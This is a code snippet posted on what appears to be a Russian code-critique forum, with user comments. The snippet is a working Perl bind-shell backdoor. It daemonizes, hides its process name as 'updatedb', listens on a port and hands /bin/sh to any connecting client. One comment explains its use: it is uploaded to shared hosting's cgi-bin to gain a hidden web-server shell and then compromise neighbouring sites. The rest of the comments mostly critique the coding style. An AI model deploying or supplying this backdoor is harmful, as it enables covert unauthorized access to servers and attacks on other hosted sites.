- 01
- 02
- 03
- 04
- 05
- 06
- 07
- 08
- 09
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
#!/usr/bin/perl
$port = 32767;
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
}
guest 30.12.2008 06:26 # 0
guest 27.01.2009 03:16 # 0
вообще бред какой-то =\
guest 23.02.2009 15:48 # 0
Неумение подобрать имя переменной - не говнокодерство.
guest 23.04.2009 21:25 # 0
Написано специально для закидывания на хостинг, где разрешен cgi-bin. Скрипт открывает шелл с правами вебсервера на определенном порту, и меняет свое имя в списке процессов, чтобы не было заметно. Потом прогулки по /home/ и взлом соседних сайтов. Не является говнокодом.
guest 28.04.2009 19:35 # 0
>Не является говнокодом.
А это что:
$port = 32767;
$port = $ARGV[0] if $ARGV[0];
?
$port = $ARGV[0] || 32767
не?
guest 11.08.2009 12:09 # 0
guest8 04.11.2018 03:51 # −999
bormand 04.11.2018 06:42 # 0
> login
Он же пароль попросит и в сислог всё запишет. Не айс для шелл-кода.